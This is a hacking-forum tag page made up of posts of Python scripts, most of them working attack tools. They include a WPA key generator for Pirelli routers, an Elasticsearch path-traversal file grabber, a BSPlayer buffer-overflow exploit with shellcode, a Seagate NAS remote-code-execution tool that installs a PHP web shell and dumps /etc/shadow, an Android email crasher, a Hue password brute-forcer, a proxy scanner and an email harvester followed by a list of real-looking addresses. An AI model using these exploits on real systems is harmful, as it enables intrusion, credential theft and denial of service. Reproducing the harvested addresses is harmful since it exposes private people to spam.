Search the Community
Showing results for tags 'print'.
-
Am cumparat acum cateva zile de la cineva acest scanner si in 2 zile de scanat cu el tot astept sa prind si eu 1 socks. ) Poate nu stiu eu sa-l folosesc rog pe cei care il testeaza sa posteze un feedback . python scanner.py start_ip-end_ip import sys import os import socket import urllib from random import randint def get_ports(): port=[] for i in range(0,65536): if(i!=80 and i!=1080): port.append(i) return port ports = get_ports() get_host = "https://www.google.com" socket.setdefaulttimeout(3) def getGeo(ip): return urllib.urlopen('http://ipinfo.io/'+ip+'/country').read() def get_ips(start_ip, stop_ip): ips = [] tmp = [] for i in start_ip.split('.'): tmp.append("%02X" % long(i)) start_dec = long(''.join(tmp), 16) tmp = [] for i in stop_ip.split('.'): tmp.append("%02X" % long(i)) stop_dec = long(''.join(tmp), 16) while(start_dec < stop_dec + 1): bytes = [] bytes.append(str(int(start_dec / 16777216))) rem = start_dec % 16777216 bytes.append(str(int(rem / 65536))) rem = rem % 65536 bytes.append(str(int(rem / 256))) rem = rem % 256 bytes.append(str(rem)) ips.append(".".join(bytes)) start_dec += 1 return ips def scan(ip): vuln = open('vuln.txt', 'a') for port in ports: try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, port)) print "Am gasit unu!\n" vuln.write(ip + ":" + str(port)+'|'+getGeo(ip)+'\n') vuln.flush() s.send("GET " + get_host + " HTTP/1.0\r\n") s.send("\r\n") while 1: data = s.recv(1024) if not data: break print data s.close() except socket.error: print 'Scanez..' if len(sys.argv) < 2: print sys.argv[0] + "IP: start-end" sys.exit(1) else: if len(sys.argv) == 3: get_host = sys.argv[2] if sys.argv[1].find('-') > 0: start_ip, stop_ip = sys.argv[1].split("-") ips = get_ips(start_ip, stop_ip) while len(ips) > 0: i = randint(0, len(ips) - 1) aip = str(ips[i]) del ips[i] scan(aip) else: scan(sys.argv[1])
-
Un programel simplu facut in pauza de masa. Enjoy: __author__ = "MrGrj" import binascii def bas64decryption(): encoded_string = raw_input("Please insert the base64 encrypted text:") decoded_string = encoded_string.decode('base64') if encoded_string is None: print 'You inserted a null string. Please enter a valid string next time !' else: print 'Your decoded string:' + ' ' + decoded_string def base64encryption(): decoded_string = raw_input("Please insert the text that you want to encode:") encoded_string = decoded_string.encode('base64') if decoded_string is None: print 'You inserted a null string. Please enter a valid string next time !' else: print 'Your encoded string:' + ' ' + encoded_string if __name__ == "__main__": menu = {} menu['1'] = "Base 64 decryption." menu['2'] = "Base 64 encryption." menu['3'] = "Exit." while True: options = menu.keys() options.sort() for entry in options: print entry, menu[entry] selection = raw_input("What would you like to do? ") if selection == "1": try: bas64decryption() except binascii.Error: print "This is not a base64 encoded string!" elif selection == "2": try: base64encryption() except binascii.Error: print "Something went wrong! Please try again" elif selection == "3": print "Bye-bye" break else: print "This is not a valid choice !" O sa revin cu update-uri in topicul asta cu alte functii de decoding / encoding. Apoi, cu restul membrilor care stiu python sa facem ceva misto, optimizat, etc. Asta daca se vrea si eu timp. @MasterLight
- 5 replies
-
- decoded_string
- encoded_string
-
(and 3 more)
Tagged with:
-
#!/usr/bin/env python # -*- coding: utf-8 -*- ''' @license: GPLv3 @author : Eduardo Novella @ARNetOnline via Twitter @enovella_ 2014-09-15 Send a message via website, still looking for a simple mail ([url]http://www.telecom.com.ar/hogares/contacto_tecnico.html[/url]) 2014-09-16 Send another message to Arnet via website. First reply via twitter where they redirect me to the website form. 2014-09-19 Direct message via twitter. I talk with them about the critical vulnerability and offer them an email with PGP key 2014-09-20 More twitter PM about the same. They do not want to be aware about the problem though. 2014-09-23 I assume that Arnet does not care about its clients' security at all regarding its little interest. 2014-09-24 I send the problem to the vendor ADB Pirelli via website form 2014-09-28 I send the problem to the vendor ADB Pirelli via email to Switzerland 2015-01-05 Full disclosure and CVE-2015-0558 assigned PORTUGAL ================ 2015-04-01 I receive an email confirming that the Portuguese ISP "MEO" uses the same algorithm 2015-04-05 Send a message to @MEOpt via Twitter @enovella_ 2015-04-05 I got response in matter of minutes \o/ 2015-04-05 I send an email to [email]luis-oliveira-cc@telecom.pt[/email] , stating the reference 3-78405621289 in email subject 2015-05-07 Full disclosure ----------------- [*] Changelog : ----------------- 2015-05-06 v1.4 Added MEO routers in Portugal. Essid ADSLPT-ABXXXXX 2015-02-01 v1.3 Final version, hopefully 2015-01-12 v1.2 Confusion between LAN and WLAN mac address 2015-01-10 v1.1 --allKeys flag added 2014-09-11 v1.0 First PoC working ''' import re import sys import hashlib import argparse VERSION = 1 SUBVERSION = 4 DATEVERSION = '2015-05-06' URL = 'http://www.ednolo.alumnos.upv.es' def genkey(mac,stdout='True'): seed = ('\x64\xC6\xDD\xE3\xE5\x79\xB6\xD9\x86\x96\x8D\x34\x45\xD2\x3B\x15' + '\xCA\xAF\x12\x84\x02\xAC\x56\x00\x05\xCE\x20\x75\x91\x3F\xDC\xE8') lookup = '0123456789abcdefghijklmnopqrstuvwxyz' sha256 = hashlib.sha256() sha256.update(seed) sha256.update('1236790') sha256.update(mac) digest = bytearray(sha256.digest()) if (stdout): print "[+] SHA256 : %s" % sha256.hexdigest() return ''.join([lookup[x % len(lookup)] for x in digest[0:10]]) def printTargets(): print "[+] Possible vulnerable targets so far:" for t in targets: print ("\t bssid: {0:s}:XX:XX:XX \t essid: WiFi-Arnet-XXXX, ADSLPT-ABXXXXX".format(t.upper())) sys.exit() def checkTargets(bssid): supported = False for t in targets: if ( bssid.upper().startswith(t) ): supported = True break if (not supported): print "[!] Your bssid looks like not supported! Generating anyway." def addIncToMac(mac_str, inc): try: mac = bytearray.fromhex('%012x' %(int(mac_str,16) + inc)) except: sys.exit('[!] Use real input ') return mac def main(): global targets version = " {0:d}.{1:d} [{2:s}] ----> {3:s}".format(VERSION,SUBVERSION,DATEVERSION,URL) targets = ['00:08:27','00:13:C8','00:17:C2','00:19:3E','00:1C:A2','00:1D:8B','00:22:33','00:8C:54', '30:39:F2','74:88:8B','84:26:15','A4:52:6F','A4:5D:A1','D0:D4:12','D4:D1:84','DC:0B:1A','F0:84:2F'] parser = argparse.ArgumentParser(description='''>>> PoC WPA keygen for WiFi Networks deployed by Arnet in Argentina and MEO in Portugal. So far only WiFi networks with essids like WiFi-Arnet-XXXX or ADSLPT-ABXXXXX and manufactured by Pirelli are likely vulnerable. See [url]http://ednolo.alumnos.upv.es/[/url] for more details. Twitter: @enovella_ and email: ednolo[at]inf.upv.es. This software is used just as proof-of-concept, commit fraud depends on you! ''', epilog='''(+) Help: python %s -b 74:88:8B:AD:C0:DE ''' %(sys.argv[0]) ) maingroup = parser.add_argument_group(title='required') maingroup.add_argument('-b','--bssid', type=str, nargs='?', help='Target mac address') parser.add_argument('-v', '--version', action='version', version='%(prog)s'+version) command_group = parser.add_mutually_exclusive_group() command_group.add_argument('-l','--list', help='List all vulnerable targets', action='store_true') command_group.add_argument('-a','--allkeys', help='Bruteforce mode', action="store_true") args = parser.parse_args() if args.list: printTargets() elif args.bssid: mac_str = re.sub(r'[^a-fA-F0-9]', '', args.bssid) if len(mac_str) != 12: sys.exit('[!] Check MAC format!\n') try: checkTargets(args.bssid) print '[+] MAC : %s' % args.bssid if (args.allkeys): print '\n[+] WPA keys for SSID: WiFi-Arnet-XXXX (Argentina)' for i in xrange(-2,5): mac = addIncToMac(mac_str,i) print '%-10s' % ((genkey(mac, False))) print '\n[+] WPA keys for SSID: ADSLPT-ABXXXXX (Portugal)' for i in xrange(-2,5): mac = addIncToMac(mac_str,i) print '%-10s' % ((genkey(mac, False)[:8])) else: wpa = genkey((addIncToMac(mac_str,0)), False) print '[+] WPA key : %-10s\t%-10s' % (wpa, "SSID: WiFi-Arnet-XXXX (Argentina)") print '[+] WPA key : %-10s\t%-10s' % (wpa[:8], "SSID: ADSLPT-ABXXXXX (Portugal)" ) except: sys.exit('[!] Are you trying to crash me? ') else: parser.print_help() if __name__ == "__main__": main() Source
-
#!/usr/bin/python # Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign # Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5 # Pedro Andujar || twitter: pandujar || email: @digitalsec.net # Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/ import socket, sys print "!dSR ElasticPwn - for CVE-2015-3337\n" if len(sys.argv) <> 3: print "Ex: %s [url]www.example.com[/url] /etc/passwd" % sys.argv[0] sys.exit() port = 9200 # Default ES http port host = sys.argv[1] fpath = sys.argv[2] def grab(plugin): socket.setdefaulttimeout(3) s = socket.socket() s.connect((host,port)) s.send("GET /_plugin/"+plugin+"/../../../../../.."+fpath+ " HTTP/1.0\n" "Host: "+host+"\n\n") file = s.recv(2048) print " [*] Trying to retrieve "+str(fpath)+":" if ("HTTP/1.0 200 OK" in file): print "\n"+file else: print "[-] File Not Found or system not vulnerable" def pfind(plugin): try: socket.setdefaulttimeout(3) s = socket.socket() s.connect((host,port)) s.send("GET /_plugin/"+plugin+"/ HTTP/1.0\n" "Host: "+host+"\n\n") file = s.recv(16) print "[*] Trying to find plugin "+plugin+":" if ("HTTP/1.0 200 OK" in file): print "[+] Plugin found!" grab(plugin) sys.exit() else: print "[-] Not Found " except Exception, e: print "[-] Error connecting to "+host+" "+str(e) sys.exit() # Include more plugin names to check if they are installed pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head'] for plugin in pluginList: pfind(plugin) Source
-
#!/usr/bin/python ''' Bsplayer suffers from a buffer overflow vulnerability when processing the HTTP response when opening a URL. In order to exploit this bug I partially overwrited the seh record to land at pop pop ret instead of the full address and then used backward jumping to jump to a long jump that eventually land in my shellcode. Tested on : windows xp sp1 - windows 7 sp1 - Windows 8 Enterprise it might work in other versions as well just give it a try My twitter: @fady_osman My youtube: [url]https://www.youtube.com/user/cutehack3r[/url] ''' import socket import sys s = socket.socket() # Create a socket object if(len(sys.argv) < 3): print "[x] Please enter an IP and port to listen to." print "[x] " + sys.argv[0] + " ip port" exit() host = sys.argv[1] # Ip to listen to. port = int(sys.argv[2]) # Reserve a port for your service. s.bind((host, port)) # Bind to the port print "[*] Listening on port " + str(port) s.listen(5) # Now wait for client connection. c, addr = s.accept() # Establish connection with client. # Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload. print(('[*] Sending the payload first time', addr)) c.recv(1024) #seh and nseh. buf = "" buf += "\xbb\xe4\xf3\xb8\x70\xda\xc0\xd9\x74\x24\xf4\x58\x31" buf += "\xc9\xb1\x33\x31\x58\x12\x83\xc0\x04\x03\xbc\xfd\x5a" buf += "\x85\xc0\xea\x12\x66\x38\xeb\x44\xee\xdd\xda\x56\x94" buf += "\x96\x4f\x67\xde\xfa\x63\x0c\xb2\xee\xf0\x60\x1b\x01" buf += "\xb0\xcf\x7d\x2c\x41\xfe\x41\xe2\x81\x60\x3e\xf8\xd5" buf += "\x42\x7f\x33\x28\x82\xb8\x29\xc3\xd6\x11\x26\x76\xc7" buf += "\x16\x7a\x4b\xe6\xf8\xf1\xf3\x90\x7d\xc5\x80\x2a\x7f" buf += "\x15\x38\x20\x37\x8d\x32\x6e\xe8\xac\x97\x6c\xd4\xe7" buf += "\x9c\x47\xae\xf6\x74\x96\x4f\xc9\xb8\x75\x6e\xe6\x34" buf += "\x87\xb6\xc0\xa6\xf2\xcc\x33\x5a\x05\x17\x4e\x80\x80" buf += "\x8a\xe8\x43\x32\x6f\x09\x87\xa5\xe4\x05\x6c\xa1\xa3" buf += "\x09\x73\x66\xd8\x35\xf8\x89\x0f\xbc\xba\xad\x8b\xe5" buf += "\x19\xcf\x8a\x43\xcf\xf0\xcd\x2b\xb0\x54\x85\xd9\xa5" buf += "\xef\xc4\xb7\x38\x7d\x73\xfe\x3b\x7d\x7c\x50\x54\x4c" buf += "\xf7\x3f\x23\x51\xd2\x04\xdb\x1b\x7f\x2c\x74\xc2\x15" buf += "\x6d\x19\xf5\xc3\xb1\x24\x76\xe6\x49\xd3\x66\x83\x4c" buf += "\x9f\x20\x7f\x3c\xb0\xc4\x7f\x93\xb1\xcc\xe3\x72\x22" buf += "\x8c\xcd\x11\xc2\x37\x12" jmplong = "\xe9\x85\xe9\xff\xff" nseh = "\xeb\xf9\x90\x90" # Partially overwriting the seh record (nulls are ignored). seh = "\x3b\x58\x00\x00" buflen = len(buf) response = "\x90" *2048 + buf + "\xcc" * (6787 - 2048 - buflen) + jmplong + nseh + seh #+ "\xcc" * 7000 c.send(response) c.close() c, addr = s.accept() # Establish connection with client. # Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload. print(('[*] Sending the payload second time', addr)) c.recv(1024) c.send(response) c.close() s.close() Source
-
#!/usr/bin/python import sys import re import string import httplib import urllib2 import re def StripTags(text): finished = 0 while not finished: finished = 1 start = text.find("<") if start >= 0: stop = text[start:].find(">") if stop >= 0: text = text[:start] + text[start+stop+1:] finished = 0 return text if len(sys.argv) != 2: print "\nExtracts emails from google results.\n" print "\nUsage : ./goog-mail.py <domain-name>\n" sys.exit(1) domain_name=sys.argv[1] d={} page_counter = 0 try: while page_counter < 50 : results = 'http://groups.google.com/groups?q='+str(domain_name)+'&hl=en&lr=&ie=UTF-8&start=' + repr(page_counter) + '&sa=N' request = urllib2.Request(results) request.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)') opener = urllib2.build_opener() text = opener.open(request).read() emails = (re.findall('([\w\.\-]+@'+domain_name+')',StripTags(text))) for email in emails: d[email]=1 uniq_emails=d.keys() page_counter = page_counter +10 except IOError: print "Can't connect to Google Groups!"+"" page_counter_web=0 try: print "\n\n+++++++++++++++++++++++++++++++++++++++++++++++++++++"+"" print "+ Google Web & Group Results:"+"" print "+++++++++++++++++++++++++++++++++++++++++++++++++++++\n\n"+"" while page_counter_web < 50 : results_web = 'http://www.google.com/search?q=%40'+str(domain_name)+'&hl=en&lr=&ie=UTF-8&start=' + repr(page_counter_web) + '&sa=N' request_web = urllib2.Request(results_web) request_web.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)') opener_web = urllib2.build_opener() text = opener_web.open(request_web).read() emails_web = (re.findall('([\w\.\-]+@'+domain_name+')',StripTags(text))) for email_web in emails_web: d[email_web]=1 uniq_emails_web=d.keys() page_counter_web = page_counter_web +10 except IOError: print "Can't connect to Google Web!"+"" for uniq_emails_web in d.keys(): print uniq_emails_web+"" Sursa Test ! anci-ste@alice.it fcrovace@alice.it antorake@alice.it lauradilu@alice.it salvo_brusca67@alice.it pagescaos_calmo@alice.it claudio.maccherani@alice.it pagesaicelombarda@alice.it monicagasbarri@alice.it S.Camillo-Forlaninilportalone@alice.it materli1@alice.it lsantini@alice.it pincopallino@alice.it gratours@alice.it aicelombarda@alice.it Castrofilippofilippafarruggio@alice.it pagesfcrovace@alice.it luci.ba@alice.it poate il face cineva sa mearga mai bine prinde maxim 10-20 email-uri si se opreste .. Il rog frumos sa-mi dea si mie sau sa posteze !
-
#!/usr/bin/env python # # Seagape # ======= # Seagate Business NAS pre-authentication remote code execution # exploit as root user. # # by OJ Reeves (@TheColonial) - for full details please see # https://beyondbinary.io/advisory/seagate-nas-rce/ # # Usage # ===== # seagape.py <ip> <port> [-c [ua]] # # - ip : ip or host name of the target NAS # - port : port of the admin web ui # - -c : (optional) create a cookie which will give admin access. # Not specifying this flag results in webshell installation. # - ua : (optional) the user agent used by the browser for the # admin session (UA must match the target browser). # Default value is listed below # # Example # ======= # Install and interact with the web shell: # seagape.py 192.168.0.1 80 # # Create admin cookie # seagape.py 192.168.0.1 80 -c import base64 import hashlib import itertools import os import re import socket import sys import urllib import urllib2 import uuid import xml.sax.saxutils if len(sys.argv) < 3: print "Usage: {0} <ip> <port> [-c [user agent]]".format(sys.argv[0]) sys.exit(1) # Every Seagate nas has the same XOR key. Great. XOR_KEY = '0f0a000d02011f0248000d290d0b0b0e03010e07' # This is the User agent we'll use for most of the requests DEFAULT_UA = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' # This is the description we're going to be reading from LFI_FILE = '/etc/devicedesc' # the base globals that will hold our state host = sys.argv[1] port = int(sys.argv[2]) cis = '' hostname = '' webshell = str(uuid.uuid1()) + ".php" def chunks(s, n): for i in xrange(0, len(s), n): yield s[i:i + n] def forward_interleave(a, : return ''.join(itertools.chain(*zip(itertools.cycle(a), )) def xor(s, k): return ''.join(chr(ord(a) ^ ord() for a, b in itertools.izip(s, itertools.cycle(k))) def sha1(s): return hashlib.sha1(s).hexdigest() def decode(s): f = xor(s, XOR_KEY) return ''.join(chr(ord(a) ^ ord() for a, b in chunks(f, 2)) def encode(s): s = forward_interleave(sha1(s), s) s = ''.join(a + chr(ord(a) ^ ord() for a, b in chunks(s, 2)) return xor(s, XOR_KEY) def make_request(uri = "/", ci_session = None, headers = None, post_data = None): method = 'GET' if not headers: headers = {} headers['Host'] = host if 'User-Agent' not in headers: headers['User-Agent'] = DEFAULT_UA if 'Accept' not in headers: headers['Accept'] = 'text/html' if post_data: method = 'POST' post_data = urllib.urlencode(post_data) headers['Content-Type'] = 'application/x-www-form-urlencoded' if ci_session: ci_session = urllib.quote(base64.b64encode(encode(ci_session))) headers['Cookie'] = 'ci_session={0}'.format(ci_session) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) http = "" http += "{0} {1} HTTP/1.1\r\n".format(method, uri) for h in headers: http += "{0}: {1}\r\n".format(h, headers[h]) if post_data: http += "Content-Length: {0}\r\n".format(len(post_data)) http += "\r\n" if post_data: http += post_data s.send(http) result = "" while True: data = s.recv(1024) if not data: break result += data s.close() return result def get_ci_session(): resp = make_request() for l in resp.split("\r\n"): m = re.findall("Set-Cookie: ([a-zA-Z0-9_\-]+)=([a-zA-Z0-9\+%=/]+);", l) for name, value in m: if name == 'ci_session' and len(value) > 40: return decode(base64.b64decode(urllib.unquote(value))) print "Unable to establish session with {0}".format(host) sys.exit(1) def add_string(ci_session, key, value): prefix = 's:{0}:"{1}";s:'.format(len(key), key) if prefix in ci_session: ci_session = re.sub(r'{0}\d+:"[^"]*"'.format(prefix), '{0}{1}:"{2}"'.format(prefix, len(value), value), ci_session) else: # doesn't exist, so we need to add it to the start and the end. count = int(ci_session.split(':')[1]) + 1 ci_session = re.sub(r'a:\d+(.*)}$', r'a:{0}\1{1}{2}:"{3}";}}'.format(count, prefix, len(value), value), ci_session) return ci_session def set_admin(ci_session): return add_string(ci_session, "is_admin", "yes") def set_language(ci_session, lang): return add_string(ci_session, "language", lang) def include_file(ci_session, file_path): if file_path[0] == '/': file_path = '../../../../../..' + file_path return set_language(ci_session, file_path + "\x00") def read_file(file_path, post_data = None): resp = make_request(ci_session = include_file(cis, file_path), headers = {}, post_data = post_data) return resp def hashdump(): shadow = read_file('/etc/shadow') for l in shadow.split("\n"): if l and ':!:' not in l and ':' not in l: parts = l.split(':') print "{0}:{1}".format(parts[0], parts[1]) def cmd(command): headers = { 'Content-Type' : 'application/x-www-form-urlencoded', 'Accept' : '*/*', 'User-Agent' : DEFAULT_UA } post_data = urllib.urlencode({'c' : command}) headers['Content-Type'] = 'application/x-www-form-urlencoded' ci_session = urllib.quote(base64.b64encode(encode(cis))) headers['Cookie'] = 'ci_session={0}'.format(ci_session) url = 'http://{0}:{1}/{2}'.format(host, port, webshell) req = urllib2.Request(url, headers = headers, data = post_data) return urllib2.urlopen(req).read() def shell(): running = True while running: c = raw_input("Shell ({0}) $ ".format(post_id)) if c != 'quit' and c != 'exit': cmd(c) else: running = False def show_admin_cookie(user_agent): ci_session = add_string(cis, 'is_admin', 'yes') ci_session = add_string(ci_session, 'username', 'admin') ci_session = add_string(ci_session, 'user_agent', user_agent) ci_session = urllib.quote(base64.b64encode(encode(ci_session))) print "Session cookies are bound to the browser's user agent." print "Using user agent: " + user_agent print "ci_session=" + ci_session def show_version(): print "Firmware Version: {0}".format(get_firmware_version()) def show_cookie(): print cis def show_help(): print "" print "Seagape v1.0 -- Interactive Seagate NAS Webshell" print " - OJ Reeves (@TheColonial) - https://beyondbinary.io/" print " - https://beyondbinary.io/bbsec/001" print "===========================================================================" print "version - Print the current firmware version to screen." print "dumpcookie - Print the current cookie to screen." print "admincookie <ua> - Create an admin login cookie (ua == user agent string)." print " Add to your browser and access ANY NAS box as admin." print "help - Show this help." print "exit / quit - Run for the hills." print "<anything else> - Execute the command on the server." print "" def execute(user_input): result = True parts = user_input.split(' ') c = parts[0] if c == 'admincookie': ua = DEFAULT_UA if len(parts) > 1: ua = ' '.join(parts[1:]) show_admin_cookie(ua) elif c == 'dumpcookie': show_cookie() elif c == 'version': show_version() elif c == 'help': show_help() elif c == 'quit' or c == 'exit': remove_shell() result = False else: print cmd(user_input) return result def get_firmware_version(): resp = make_request("/index.php/mv_system/get_firmware?_=1413463189043", ci_session = acis) return resp.replace("\r", "").replace("\n", "").split("version")[1][1:-2] def install_shell(): resp = make_request("/index.php/mv_system/get_general_setup?_=1413463189043", ci_session = acis) existing_setup = '' for l in resp.split("\r\n"): if 'general_setup' in l: existing_setup = l break # generate the shell and its installer exec_post = base64.b64encode("<?php if(isset($_POST['c'])&&!empty($_POST['c'])){system($_POST['c']);} ?>") installer = '<?php file_put_contents(\'{0}\', base64_decode(\'{1}\')); ?>'.format(webshell, exec_post) write_php = xml.sax.saxutils.quoteattr(installer)[1:-1] start = existing_setup.index('" description="') + 15 end = existing_setup.index('"', start) updated_setup = existing_setup[0:start] + write_php + existing_setup[end:] # write the shell to the description resp = make_request("/index.php/mv_system/set_general_setup?_=1413463189043", ci_session = acis, headers = { }, post_data = { 'general_setup' : updated_setup }) # invoke the installer read_file(LFI_FILE) # remove the installer resp = make_request("/index.php/mv_system/set_general_setup?_=1413463189043", ci_session = acis, headers = { }, post_data = { 'general_setup' : existing_setup }) def remove_shell(): return cmd('rm -f {0}'.format(webshell)) print "Establishing session with {0} ...".format(host) cis = get_ci_session() if len(sys.argv) >= 4 and sys.argv[3] == '-c': ua = DEFAULT_UA if len(sys.argv) > 4: ua = sys.argv[4] show_admin_cookie(ua) else: print "Configuring administrative access ..." acis = add_string(cis, 'is_admin', 'yes') acis = add_string(acis, 'username', 'admin') print "Installing web shell (takes a while) ..." install_shell() print "Extracting id and hostname ..." identity = cmd('whoami').strip() hostname = cmd('cat /etc/hostname').strip() show_help() running = True while running: try: user_input = raw_input("Seagape ({0}@{1})> ".format(identity, hostname)) running = execute(user_input) except: print "Something went wrong. Try again." Source
-
- ci_session
- def
-
(and 3 more)
Tagged with:
-
Summary: A bug in the stock Google email application version 4.4.2.0200 has been found. An attacker can remotely perform an Denial Of Service attack by sending a specially crafted email. No interaction from the user is needed to produce the crash just receive the malicious email. The CVE-2015-1574 has been assigned. Version 4.2.2.0200 running on a Samsung Galaxy 4 mini fully updated (19 Jan 2015) is affected. Newer versions 4.2.2.0400 are not affected. Details and proof of concept exploit at: http://hmarco.org/bugs/google_email_app_4.2.2_denial_of_service.html Regards, Hector Marco. http://hmarco.org ---------------- Exploit crash_Android_Google_email_4.2.2.0200.py: #!/usr/bin/python ''' * $FILE: crash_Android_Google_email_4.2.2.0200.py * * $VERSION$ * * Authors: Hector Marco <hecmargi@upv.es> * Ismael Ripoll <iripoll@disca.upv.es> * * Date: Released 07 Jan 2015 * * Attack details: http://hmarco.org * * $LICENSE: * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. ''' import smtplib from smtplib import SMTPException import sys import getopt #### START CONFIGURE ##### smtpServer = "" # set an appropriate SMTP server smtpServerPort = 25 # SMTP port, default 25 #### END CONFIGURE ##### sender = '' receivers = [] def usage(): print '\n$ %s -s sender@email.com -r receiver@email.com\n' % sys.argv[0] sys.exit(2) def smtpNotConfigured(): print '\n[-] Error: Edit this script and set a SMTP server to send emails\n' sys.exit(2) def printHeader(): print "\nEmail Android Google 4.2.2.0200 crasher" print "=======================================" print "Author: Hector Marco <hmarco@hmarco.org>" print "Website: http://hmarco.org" def main(argv): global sender global receivers try: opts, args = getopt.getopt(argv,"hs:r:",["s=","r="]) if len(sys.argv) == 1: usage() except getopt.GetoptError: usage() for opt, arg in opts: if opt == '-h': usage() elif opt in ("-s", "--sender"): sender = arg elif opt in ("-r", "--receiver"): receivers.append(arg) if __name__ == "__main__": printHeader() if len(smtpServer) == 0: smtpNotConfigured() main(sys.argv[1:]) message = "From: Sender <%s>\n" % sender message += "To: Receiver <%s>\n" % receivers[0] message += """Subject: Crash test Content-Type: text/plain Content-Transfer-Encoding: 8BIT Content-Disposition: ; """ print "\n[+] Sending crafted message to: %s" % receivers[0] try: smtpObj = smtplib.SMTP(smtpServer, int(smtpServerPort)); smtpObj.sendmail(sender, receivers, message) print "[+] Malicious email successfully sent." except SMTPException: print "[-] Error: unable to send the email. Invalid SMTP server ???" sys.exit(2) Source
-
Hadoop User Experience password cracking script. Written in Python. #!/usr/bin/python import sys import requests import datetime from fake_useragent import UserAgent ## CONFIG STARTS HERE ## user = "admin" host = "hostname:port" listfile = "~/dictionaries/top1000-worst-passwords.txt" ## CONFIG ENDS HERE## dictionary = open(listfile) list = dictionary.readlines() words = [ ] print "Initializing dictionary", for entry in list: print('.'), newword = entry.rstrip("\n") words.append(newword) print "Now testing " for password in words: ua = UserAgent().random headers = { "User-Agent" : ua } post = { "username" : user, "password" : password } r = requests.post("http://" + host + "/accounts/login/?next=/", headers=headers, data=post) invalid = r.text.find("Invalid") if invalid == -1: print "\nSuccess! " + user + ":" + password print "Completed test at ", print datetime.datetime.now() sys.exit() else: print "...." print "Attack unsuccessful...Completed at ", Source
-
The term “Big Data” has been flinging around quite a lot lately. It is in the news all the time. We hear about how much it has pushed us into the future and into the internet of things. These things all will produce useful data that will need to be analyzed and stored. One technology that we hear more and more about is Hadoop. Hadoop was birthed as an open source project from the Google filesystem (GFS), and Map Reduce white-papers; the creator is Doug Cutting and the open source community. Map reduce is the core of Hadoop, and allows the user to write very simple programs to distribute workload across a complex amount of data. The Google filesystem inspired the majority of the work for the open source Hadoop filesystem (HDFS). HDFS is a redundant filesystem written in Java that distributes data across multiple machines that can be analyzed using Map reduce programming. That is just a brief dive into what Hadoop is, and if you want to learn more I highly recommend you take a gander at the Yahoo Hadoop tutorial. Here is an ecosystem filled with projects that make managing this complex monster easier on administrator’s and developer’s. One of these projects that I really enjoy is Hue, the Hadoop User Experience. It gives a web interface for the user to query their data using some of these projects that live in this big data ecosystem like: Hive Pig Oozie Impala Each of these tools sits in front of a plethora of data that the user is analyzing. This data can be anything from a company’s customer generated data that tells a music service what song to play next, to another company trying to figure out which ads to serve you based on your browsing history. My point being — Hue has access to some seriously valuable information. As with most technologies, security is often an after-thought. It is important we test the security of these applications so that we can protect my data and your data from the evil-doers who will sell the same information or use it for awful things. Perhaps a criminal can use pilfered data about you to create malware that you will more easily fall prey to. The reason that I have picked Hue as an example of a much larger conversation is because it is pretty, and it does cool things. Hue has a standard user management system that allows the administrator to grant access to certain accounts. Lets crack some Hue accounts! Of course in this article I’m using a Virtual Machine and not testing on live systems in the wild. That would be highly unethical…but the point of this is to help others remember that not all people out there are ethical, and to “scare” people into taking preventive measures to thwart attacks — much like children stories about being good or the boogie man will get you. So, I decided to test the limits and see how easy it would be to crack into a Hue account using old school methods of brute-forcing. As a standard bad practice people use the username ‘admin’ as the default administrative user for their systems. Shall we see if we can crack a user account. ~$ ./hute.py .... .... .... .... .... .... .... .... .... .... .... Success! admin:admin Completed attack at 2014-09-30 16:19:55.113608 Here is the source code for those who care and would like to test their own systems using the same methods in this proof of concept. #!/usr/bin/python import sys import requests import datetime from fake_useragent import UserAgent ## CONFIG STARTS HERE ## user = "admin" host = "hostname:port" listfile = "~/dictionaries/top1000-worst-passwords.txt" ## CONFIG ENDS HERE## dictionary = open(listfile) list = dictionary.readlines() words = [ ] print "Initializing dictionary", for entry in list: print('.'), newword = entry.rstrip("\n") words.append(newword) print "Now testing " for password in words: ua = UserAgent().random headers = { "User-Agent" : ua } post = { "username" : user, "password" : password } r = requests.post("http://" + host + "/accounts/login/?next=/", headers=headers, data=post) invalid = r.text.find("Invalid") if invalid == -1: print "\nSuccess! " + user + ":" + password print "Completed test at ", print datetime.datetime.now() sys.exit() else: print "...." print "Attack unsuccessful...Completed at ", print datetime.datetime.now() What next, how do we stop the attacks? At the time of this writing it would seem that Hue does not have a mechanism for two-factor authentication, although there are libraries out there for two factor auth within django. What we can do is protect Hue with some iptables magic. We can use iptables’ recent module to keep an eye out for shady traffic and to act on that traffic: $ iptables -I INPUT -p tcp --dport 8888 -m state --state NEW -m recent --name hue-firewall --update --seconds 30 --hitcount 10 -j DROP ~$ iptables -I INPUT -p tcp --dport 8888 -m state --state NEW -m recent --name hue-firewall --set Above when we have more than 10 immediate hits we will drop the incoming traffic for 30 seconds, thus thwarting any effective bruteforce attempt. It is not full-proof, but definitely going to put a dent in most bruteforce attacks on Hue. The point of this article is to not shame Hue by any means, but to shine light on security in this emerging space. Unfortunately the issue of bruteforce is an age old concern. The developers and systems administrators would like to blame the users themselves for choosing such awful passphrases. We can shuffle this around all we want, but only a few lines of code to save the user from hanging themselves — which is the job of the developer. These security lessons have been learned time and time again Source
-
